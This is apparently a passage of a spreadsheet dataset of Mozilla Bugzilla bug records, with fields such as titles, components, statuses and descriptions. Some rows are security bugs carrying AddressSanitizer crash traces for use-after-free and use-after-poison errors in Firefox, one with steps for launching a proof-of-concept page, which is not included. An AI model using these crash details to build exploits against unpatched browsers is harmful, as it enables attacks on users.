    #1 0x7ffb034f3042 in mozilla::dom::ImageBitmapShutdownObserver::Release /builds/worker/checkouts/gecko/dom/canvas/ImageBitmap.cpp:137
    #2 0x7ffafd629fe5 in nsTHashtable&lt;nsObserverList&gt;::s_ClearEntry /builds/worker/workspace/obj-build/dist/include/nsTHashtable.h:720
    #3 0x7ffafd5d600c in PLDHashTable::~PLDHashTable /builds/worker/checkouts/gecko/xpcom/ds/PLDHashTable.cpp:293
    #4 0x7ffafd5d6290 in PLDHashTable::Clear /builds/worker/checkouts/gecko/xpcom/ds/PLDHashTable.cpp:312
    #5 0x7ffafd82f49a in mozilla::ShutdownXPCOM /builds/worker/checkouts/gecko/xpcom/build/XPCOMInit.cpp:633
    #6 0x7ffb0c0cf54a in XRE_InitChildProcess /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:661
    #7 0x7ff6e0c92953 in NS_internal_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:375
    #8 0x7ff6e0c9169b in wmain /builds/worker/checkouts/gecko/toolkit/xre/nsWindowsWMain.cpp:167
    #9 0x7ff6e0d734e7 in __scrt_common_main_seh D:\a\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #10 0x7ffbb0d17613 in BaseThreadInitThunk+0x13 (C:\WINDOWS\System32\KERNEL32.DLL+0x180017613)
    #11 0x7ffbb0fe26b0 in RtlUserThreadStart+0x20 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x1800526b0)
previously allocated by thread T22 here:
    #0 0x7ffb5fd4f39d in malloc /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_malloc_win.cpp:98
    #1 0x7ffb6dfa11ad in moz_xmalloc /builds/worker/checkouts/gecko/memory/mozalloc/mozalloc.cpp:52
    #2 0x7ffb034f3a45 in mozilla::dom::ImageBitmap::ImageBitmap /builds/worker/checkouts/gecko/dom/canvas/ImageBitmap.cpp:651
    #3 0x7ffb034f6d57 in mozilla::dom::ImageBitmap::CreateFromOffscreenCanvas /builds/worker/checkouts/gecko/dom/canvas/ImageBitmap.cpp:949
    #4 0x7ffb03517068 in mozilla::dom::OffscreenCanvas::TransferToImageBitmap /builds/worker/checkouts/gecko/dom/canvas/OffscreenCanvas.cpp:346
    #5 0x7ffb0174bf77 in mozilla::dom::OffscreenCanvas_Binding::transferToImageBitmap /builds/worker/workspace/obj-build/dom/bindings/OffscreenCanvasBinding.cpp:1171
    #6 0x7ffb03208582 in mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions&gt; /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3327
    #7 0x2fffc814c4  (&lt;unknown module&gt;)
Thread T22 created by T0 here:
    #0 0x7ffb5fd5ce72 in __asan_wrap_CreateThread /builds/worker/fetches/llvm-project/compiler-rt/lib/asan/asan_win.cpp:146
    #1 0x7ffbae991896 in beginthreadex+0x56 (C:\WINDOWS\System32\ucrtbase.dll+0x180021896)
    #2 0x7ffb5d4092f2 in _PR_MD_CREATE_THREAD /builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c:153
    #3 0x7ffb5d43173e in _PR_NativeCreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:1058
    #4 0x7ffb5d431f42 in _PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:1184
    #5 0x7ffb5d427e2f in PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c:1404
    #6 0x7ffafd78ff5f in nsThread::Init /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:634
    #7 0x7ffb06a27026 in mozilla::dom::WorkerThread::Create /builds/worker/checkouts/gecko/dom/workers/WorkerThread.cpp:101
    #8 0x7ffb06990c43 in mozilla::dom::workerinternals::RuntimeService::ScheduleWorker /builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp:1313
    #9 0x7ffb0698eb31 in mozilla::dom::workerinternals::RuntimeService::RegisterWorker /builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp:1195
    #10 0x7ffb069e9d84 in mozilla::dom::WorkerPrivate::Constructor /builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp:2684
    #11 0x7ffb069ad485 in mozilla::dom::Worker::Constructor /builds/worker/checkouts/gecko/dom/workers/Worker.cpp:50
    #12 0x7ffb0273b1d9 in mozilla::dom::Worker_Binding::_constructor /builds/worker/workspace/obj-build/dom/bindings/WorkerBinding.cpp:1158
    #13 0x7ffb0dfadb87 in InternalConstruct /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:727
    #14 0x7ffb0dfc89ee in js::Interpret /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3380
    #15 0x7ffb0dfa9803 in js::RunScript /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:458
    #16 0x7ffb0dfaf1b5 in js::ExecuteKernel /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:845
    #17 0x7ffb0dfaf611 in js::Execute /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:877
    #18 0x7ffb0c53a5bd in ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:494
    #19 0x7ffb0c53a94f in JS_ExecuteScript /builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp:518
    #20 0x7ffb00c821a7 in mozilla::dom::JSExecutionContext::ExecScript /builds/worker/checkouts/gecko/dom/base/JSExecutionContext.cpp:241
    #21 0x7ffb07027306 in mozilla::dom::ScriptLoader::EvaluateScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2440
    #22 0x7ffb07025653 in mozilla::dom::ScriptLoader::EvaluateScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2244
    #23 0x7ffb0701bc8c in mozilla::dom::ScriptLoader::ProcessRequest /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1884
    #24 0x7ffb07016a1a in mozilla::dom::ScriptLoader::ProcessInlineScript /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1318
    #25 0x7ffb07000f02 in mozilla::dom::ScriptLoader::ProcessScriptElement /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:908
    #26 0x7ffb06fffcb3 in mozilla::dom::ScriptElement::MaybeProcessScript /builds/worker/checkouts/gecko/dom/script/ScriptElement.cpp:182
    #27 0x7ffaff71b7aa in nsHtml5TreeOpExecutor::RunScript /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:950
    #28 0x7ffaff715c5e in nsHtml5TreeOpExecutor::RunFlushLoop /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:741
    #29 0x7ffaff7239d4 in nsHtml5ExecutorFlusher::Run /builds/worker/checkouts/gecko/parser/html/nsHtml5StreamParser.cpp:174
    #30 0x7ffafd76219e in mozilla::RunnableTask::Run /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:559
    #31 0x7ffafd743e51 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:886
    #32 0x7ffafd73f595 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:709
    #33 0x7ffafd7401e4 in mozilla::TaskController::ProcessPendingMTTask /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:495
    #34 0x7ffafd765ae1 in mozilla::detail::RunnableFunction&lt;`lambda at /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:218:7'&gt;::Run /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.h:548
    #35 0x7ffafd795a8e in nsThread::ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1199
    #36 0x7ffafd7a62f1 in NS_ProcessNextEvent /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:480
    #37 0x7ffafee92007 in mozilla::ipc::MessagePump::Run /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:85
    #38 0x7ffafedae5f3 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:363
    #39 0x7ffafedae3ba in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:345
    #40 0x7ffb07579b5c in nsBaseAppShell::Run /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:148
    #41 0x7ffb07798227 in nsAppShell::Run /builds/worker/checkouts/gecko/widget/windows/nsAppShell.cpp:466
    #42 0x7ffb0c0cff5e in XRE_RunAppShell /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:722
    #43 0x7ffafedae5f3 in MessageLoop::RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:363
    #44 0x7ffafedae3ba in MessageLoop::Run /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:345
    #45 0x7ffb0c0cf518 in XRE_InitChildProcess /builds/worker/checkouts/gecko/toolkit/xre/nsEmbedFunctions.cpp:657
    #46 0x7ff6e0c92953 in NS_internal_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:375
    #47 0x7ff6e0c9169b in wmain /builds/worker/checkouts/gecko/toolkit/xre/nsWindowsWMain.cpp:167
    #48 0x7ff6e0d734e7 in __scrt_common_main_seh D:\a\_work\1\s\src\vctools\crt\vcstartup\src\startup\exe_common.inl:288
    #49 0x7ffbb0d17613 in BaseThreadInitThunk+0x13 (C:\WINDOWS\System32\KERNEL32.DLL+0x180017613)
    #50 0x7ffbb0fe26b0 in RtlUserThreadStart+0x20 (C:\WINDOWS\SYSTEM32\ntdll.dll+0x1800526b0)
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/checkouts/gecko/xpcom/ds/PLDHashTable.cpp:546 in PLDHashTable::Remove
Shadow bytes around the buggy address:
  0x119d234cbf00: fd fd fd fd fd fd fd fd fa fa fa fa fd fd fd fd
  0x119d234cbf80: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd
  0x119d234cc000: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa
  0x119d234cc080: fd fd fd fd fd fd fd fd fa fa fa fa fd fd fd fd
  0x119d234cc100: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd
=&gt;0x119d234cc180: fa fa fa fa fd fd fd fd fd fd fd[fd]fa fa fa fa
  0x119d234cc200: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd
  0x119d234cc280: fd fd fd fd fa fa fa fa fd fd fd fd fd fd fd fd
  0x119d234cc300: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa
  0x119d234cc380: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd
  0x119d234cc400: fd fd fd fd fa fa fa fa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4772==ABORTING</t>
        </is>
      </c>
      <c r="X2841" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2842">
      <c r="A2842" t="n">
        <v>779821</v>
      </c>
      <c r="B2842" t="inlineStr">
        <is>
          <t>2012-08-02 05:51:03 -0700</t>
        </is>
      </c>
      <c r="C2842" t="inlineStr">
        <is>
          <t>XHR created from sandboxes end up having system principal instead of principal of the sandbox</t>
        </is>
      </c>
      <c r="D2842" t="inlineStr">
        <is>
          <t>2015-10-07 18:44:48 -0700</t>
        </is>
      </c>
      <c r="E2842" t="n">
        <v>1</v>
      </c>
      <c r="F2842" t="n">
        <v>1</v>
      </c>
      <c r="G2842" t="n">
        <v>3</v>
      </c>
      <c r="H2842" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2842" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2842" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K2842" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2842" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2842" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2842" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2842" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2842" t="inlineStr">
        <is>
          <t>[qa-][adv-track-main17+]</t>
        </is>
      </c>
      <c r="Q2842" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2842" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2842" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T2842" t="n">
        <v>1</v>
      </c>
      <c r="U2842" t="n">
        <v>0</v>
      </c>
      <c r="V2842" t="n">
        <v>30</v>
      </c>
      <c r="W2842" t="inlineStr">
        <is>
          <t>I have not yet tested this just noticed the change in nsXHR init method. It is now using system principal, while previously it was using the current principal (fetched from the context stack if I'm not mistaken that has been removed...). CreateXMLHttpRequest method in XPCComponents.cpp should create an XHR object with the principal of the sandbox.</t>
        </is>
      </c>
      <c r="X2842" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2843">
      <c r="A2843" t="n">
        <v>1367696</v>
      </c>
      <c r="B2843" t="inlineStr">
        <is>
          <t>2017-05-25 02:04:03 -0700</t>
        </is>
      </c>
      <c r="C2843" t="inlineStr">
        <is>
          <t>show new user / updating user tour</t>
        </is>
      </c>
      <c r="D2843" t="inlineStr">
        <is>
          <t>2017-09-13 09:18:40 -0700</t>
        </is>
      </c>
      <c r="E2843" t="n">
        <v>1</v>
      </c>
      <c r="F2843" t="n">
        <v>1</v>
      </c>
      <c r="G2843" t="n">
        <v>2</v>
      </c>
      <c r="H2843" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2843" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2843" t="inlineStr">
        <is>
          <t>New Tab Page</t>
        </is>
      </c>
      <c r="K2843" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2843" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2843" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2843" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2843" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2843" t="inlineStr">
        <is>
          <t xml:space="preserve"> [photon-onboarding] </t>
        </is>
      </c>
      <c r="Q2843" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2843" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2843" t="inlineStr">
        <is>
          <t>Firefox 56</t>
        </is>
      </c>
      <c r="T2843" t="n">
        <v>1</v>
      </c>
      <c r="U2843" t="n">
        <v>0</v>
      </c>
      <c r="V2843" t="n">
        <v>102</v>
      </c>
      <c r="W2843" t="inlineStr">
        <is>
          <t>Based on bug 1360474, overlay should able to show tour-set based on conditions</t>
        </is>
      </c>
      <c r="X2843" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2844">
      <c r="A2844" t="n">
        <v>489234</v>
      </c>
      <c r="B2844" t="inlineStr">
        <is>
          <t>2009-04-20 14:30:45 -0700</t>
        </is>
      </c>
      <c r="C2844" t="inlineStr">
        <is>
          <t>Please QA and Sign the Google Partner Repack (3.0.9)</t>
        </is>
      </c>
      <c r="D2844" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:56 -0700</t>
        </is>
      </c>
      <c r="E2844" t="n">
        <v>1</v>
      </c>
      <c r="F2844" t="n">
        <v>1</v>
      </c>
      <c r="G2844" t="n">
        <v>5</v>
      </c>
      <c r="H2844" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2844" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2844" t="inlineStr">
        <is>
          <t>Release Requests</t>
        </is>
      </c>
      <c r="K2844" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L2844" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2844" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2844" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2844" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2844" t="inlineStr"/>
      <c r="Q2844" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2844" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2844" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2844" t="n">
        <v>1</v>
      </c>
      <c r="U2844" t="n">
        <v>0</v>
      </c>
      <c r="V2844" t="n">
        <v>5</v>
      </c>
      <c r="W2844" t="inlineStr">
        <is>
          <t>Please start the QA review process on the 3.0.9 version of the Google partner distribution of Firefox.
The repack worksheet is located at:
https://wiki.mozilla.org/Partnering:Repacks:Firefox3:Google
3.0.9 installers are available from their respective locale directories at:
https://people.mozilla.com/files/partners/google/3.0.9/
Please note that the installers, until QA'd and digitally signed, are password protected. Distributions will be publicly available once they are QA'd and signed. Please contact me if there are any questions related to this distribution.
Thanks much,
kev</t>
        </is>
      </c>
      <c r="X2844" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2845">
      <c r="A2845" t="n">
        <v>1861344</v>
      </c>
      <c r="B2845" t="inlineStr">
        <is>
          <t>2023-10-26 00:48:08 -0700</t>
        </is>
      </c>
      <c r="C2845" t="inlineStr">
        <is>
          <t>use-after-poison during ReadableByteStreamQueueEntry::Buffer</t>
        </is>
      </c>
      <c r="D2845" t="inlineStr">
        <is>
          <t>2024-05-30 11:15:19 -0700</t>
        </is>
      </c>
      <c r="E2845" t="n">
        <v>1</v>
      </c>
      <c r="F2845" t="n">
        <v>1</v>
      </c>
      <c r="G2845" t="n">
        <v>3</v>
      </c>
      <c r="H2845" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2845" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2845" t="inlineStr">
        <is>
          <t>DOM: Streams</t>
        </is>
      </c>
      <c r="K2845" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2845" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2845" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2845" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2845" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2845" t="inlineStr">
        <is>
          <t>[fixed by 1861742][adv-main120+][adv-esr115.5+][reporter-external] [client-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q2845" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2845" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S2845" t="inlineStr">
        <is>
          <t>121 Branch</t>
        </is>
      </c>
      <c r="T2845" t="n">
        <v>1</v>
      </c>
      <c r="U2845" t="n">
        <v>0</v>
      </c>
      <c r="V2845" t="n">
        <v>27</v>
      </c>
      <c r="W2845" t="inlineStr">
        <is>
          <t>Created attachment 9360356
poc.zip
#Reproduce
OS:Win10 X64
121.0a1 (2023-10-24) (64-bit)
step:
1. python -m http.server 1337
2. python -m ffpuppet firefox.exe -p prefs.js -d -u http://localhost:1337/poc.html
#Analysis
Coming soon
#ASAN
=================================================================
==22712==ERROR: AddressSanitizer: use-after-poison on address 0x2d73e07df008 at pc 0x7ffb4b9987c2 bp 0x005fe51f7850 sp 0x005fe51f7898
READ of size 8 at 0x2d73e07df008 thread T0
    #0 0x7ffb4b9987c1 in js::gc::detail::GetTenuredGCThingZone /builds/worker/workspace/obj-build/dist/include/js/HeapAPI.h:525
    #1 0x7ffb4b9987c1 in JS::GetTenuredGCThingZone /builds/worker/workspace/obj-build/dist/include/js/HeapAPI.h:638
    #2 0x7ffb4b9987c1 in js::gc::ExposeGCThingToActiveJS /builds/worker/workspace/obj-build/dist/include/js/HeapAPI.h:754
    #3 0x7ffb4b9987c1 in JS::ExposeObjectToActiveJS /builds/worker/workspace/obj-build/dist/include/js/HeapAPI.h:817
    #4 0x7ffb4b9987c1 in js::BarrierMethods&lt;class JSObject *, void&gt;::exposeToJS(class JSObject *) /builds/worker/workspace/obj-build/dist/include/js/RootingAPI.h:804
    #5 0x7ffb54f4ff9f in JS::Heap&lt;JSObject *&gt;::exposeToActiveJS /builds/worker/workspace/obj-build/dist/include/js/RootingAPI.h:348
    #6 0x7ffb54f4ff9f in JS::Heap&lt;JSObject *&gt;::get /builds/worker/workspace/obj-build/dist/include/js/RootingAPI.h:351
    #7 0x7ffb54f4ff9f in JS::Heap&lt;JSObject *&gt;::operator JSObject *const &amp; /builds/worker/workspace/obj-build/dist/include/js/RootingAPI.h:343
    #8 0x7ffb54f4ff9f in mozilla::dom::ReadableByteStreamQueueEntry::Buffer /builds/worker/workspace/obj-build/dist/include/mozilla/dom/ReadableByteStreamController.h:189
    #9 0x7ffb54f4ff9f in mozilla::dom::streams_abstract::ReadableByteStreamControllerFillReadRequestFromQueue(struct JSContext *, class mozilla::dom::ReadableByteStreamController *, struct mozilla::dom::ReadRequest *, class mozilla::ErrorResult &amp;) /builds/worker/checkouts/gecko/dom/streams/ReadableByteStreamController.cpp:719
    #10 0x7ffb54f531cb in mozilla::dom::ReadableByteStreamController::PullSteps(struct JSContext *, struct mozilla::dom::ReadRequest *, class mozilla::ErrorResult &amp;) /builds/worker/checkouts/gecko/dom/streams/ReadableByteStreamController.cpp:1057
    #11 0x7ffb54f6847d in mozilla::dom::streams_abstract::ReadableStreamDefaultReaderRead(struct JSContext *, class mozilla::dom::ReadableStreamGenericReader *, struct mozilla::dom::ReadRequest *, class mozilla::ErrorResult &amp;) /builds/worker/checkouts/gecko/dom/streams/ReadableStreamDefaultReader.cpp:235
    #12 0x7ffb54f7b91d in mozilla::dom::ReadableStreamDefaultReader::Read(class mozilla::ErrorResult &amp;) /builds/worker/checkouts/gecko/dom/streams/ReadableStreamDefaultReader.cpp:262
    #13 0x7ffb4ff360bf in mozilla::dom::ReadableStreamDefaultReader_Binding::read /builds/worker/workspace/obj-build/dom/bindings/./ReadableStreamDefaultReaderBinding.cpp:545
    #14 0x7ffb4ff360bf in mozilla::dom::ReadableStreamDefaultReader_Binding::read_promiseWrapper /builds/worker/workspace/obj-build/dom/bindings/./ReadableStreamDefaultReaderBinding.cpp:561
    #15 0x7ffb51599218 in mozilla::dom::binding_detail::GenericMethod&lt;struct mozilla::dom::binding_detail::NormalThisPolicy, struct mozilla::dom::binding_detail::ConvertExceptionsToPromises&gt;(struct JSContext *, unsigned int, class JS::Value *) /builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp:3327
    #16 0x7ffb5c537548 in CallJSNative /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:472
    #17 0x7ffb5c537548 in js::InternalCallOrConstruct(struct JSContext *, class JS::CallArgs const &amp;, enum js::MaybeConstruct, enum js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:566
    #18 0x7ffb5c5552af in InternalCall /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:633
    #19 0x7ffb5c5552af in js::CallFromStack /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:638
    #20 0x7ffb5c5552af in js::Interpret(struct JSContext *, class js::RunState &amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3053
    #21 0x7ffb5c536171 in MaybeEnterInterpreterTrampoline /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:386
    #22 0x7ffb5c536171 in js::RunScript(struct JSContext *, class js::RunState &amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:444
    #23 0x7ffb5c537688 in js::InternalCallOrConstruct(struct JSContext *, class JS::CallArgs const &amp;, enum js::MaybeConstruct, enum js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:598
    #24 0x7ffb5c53948b in InternalCall /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:633
    #25 0x7ffb5c53948b in js::Call(struct JSContext *, class JS::Handle&lt;class JS::Value&gt;, class JS::Handle&lt;class JS::Value&gt;, class js::AnyInvokeArgs const &amp;, class JS::MutableHandle&lt;class JS::Value&gt;, enum js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:665
    #26 0x7ffb5ae8f378 in js::Call /builds/worker/checkouts/gecko/js/src/vm/Interpreter.h:116
    #27 0x7ffb5ae8f378 in PromiseReactionJob /builds/worker/checkouts/gecko/js/src/builtin/Promise.cpp:2244
    #28 0x7ffb5c537548 in CallJSNative /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:472
    #29 0x7ffb5c537548 in js::InternalCallOrConstruct(struct JSContext *, class JS::CallArgs const &amp;, enum js::MaybeConstruct, enum js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:566
    #30 0x7ffb5c53948b in InternalCall /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:633
    #31 0x7ffb5c53948b in js::Call(struct JSContext *, class JS::Handle&lt;class JS::Value&gt;, class JS::Handle&lt;class JS::Value&gt;, class js::AnyInvokeArgs const &amp;, class JS::MutableHandle&lt;class JS::Value&gt;, enum js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:665
    #32 0x7ffb5b169b15 in JS::Call(struct JSContext *, class JS::Handle&lt;class JS::Value&gt;, class JS::Handle&lt;class JS::Value&gt;, class JS::HandleValueArray const &amp;, class JS::MutableHandle&lt;class JS::Value&gt;) /builds/worker/checkouts/gecko/js/src/vm/CallAndConstruct.cpp:119
    #33 0x7ffb4fd21da6 in mozilla::dom::PromiseJobCallback::Call(class mozilla::dom::BindingCallContext &amp;, class JS::Handle&lt;class JS::Value&gt;, class mozilla::ErrorResult &amp;) /builds/worker/workspace/obj-build/dom/bindings/./PromiseBinding.cpp:83
    #34 0x7ffb4b997f05 in mozilla::dom::PromiseJobCallback::Call /builds/worker/workspace/obj-build/dist/include/mozilla/dom/PromiseBinding.h:198
    #35 0x7ffb4b997f05 in mozilla::dom::PromiseJobCallback::Call /builds/worker/workspace/obj-build/dist/include/mozilla/dom/PromiseBinding.h:211
    #36 0x7ffb4b997f05 in mozilla::PromiseJobRunnable::Run(class mozilla::AutoSlowOperation &amp;) /builds/worker/checkouts/gecko/xpcom/base/CycleCollectedJSContext.cpp:210
    #37 0x7ffb4b9705ae in mozilla::CycleCollectedJSContext::PerformMicroTaskCheckPoint(bool) /builds/worker/checkouts/gecko/xpcom/base/CycleCollectedJSContext.cpp:673
    #38 0x7ffb55413aec in mozilla::CycleCollectedJSContext::LeaveMicroTask /builds/worker/workspace/obj-build/dist/include/mozilla/CycleCollectedJSContext.h:246
    #39 0x7ffb55413aec in mozilla::nsAutoMicroTask::~nsAutoMicroTask /builds/worker/workspace/obj-build/dist/include/mozilla/CycleCollectedJSContext.h:394
    #40 0x7ffb55413aec in mozilla::dom::ScriptLoader::EvaluateScript(class nsIGlobalObject *, class JS::loader::ScriptLoadRequest *) /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2760
    #41 0x7ffb55411b62 in mozilla::dom::ScriptLoader::EvaluateScriptElement(class JS::loader::ScriptLoadRequest *) /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2551
    #42 0x7ffb5540807d in mozilla::dom::ScriptLoader::ProcessRequest(class JS::loader::ScriptLoadRequest *) /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:2193
    #43 0x7ffb55403412 in mozilla::dom::ScriptLoader::ProcessInlineScript(class nsIScriptElement *, enum JS::loader::ScriptKind) /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1434
    #44 0x7ffb553eb0b2 in mozilla::dom::ScriptLoader::ProcessScriptElement(class nsIScriptElement *, class nsTAutoStringN&lt;char16_t, 64&gt; const &amp;) /builds/worker/checkouts/gecko/dom/script/ScriptLoader.cpp:1015
    #45 0x7ffb553ea0e4 in mozilla::dom::ScriptElement::MaybeProcessScript(void) /builds/worker/checkouts/gecko/dom/script/ScriptElement.cpp:195
    #46 0x7ffb4db84118 in nsIScriptElement::AttemptToExecute /builds/worker/workspace/obj-build/dist/include/nsIScriptElement.h:223
    #47 0x7ffb4db84118 in nsHtml5TreeOpExecutor::RunScript(class nsIContent *, bool) /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:957
    #48 0x7ffb4db7eb65 in nsHtml5TreeOpExecutor::RunFlushLoop(void) /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:742
    #49 0x7ffb4db8ec71 in nsHtml5ExecutorReflusher::Run(void) /builds/worker/checkouts/gecko/parser/html/nsHtml5TreeOpExecutor.cpp:83
    #50 0x7ffb4bbd5d1e in mozilla::RunnableTask::Run(void) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:549
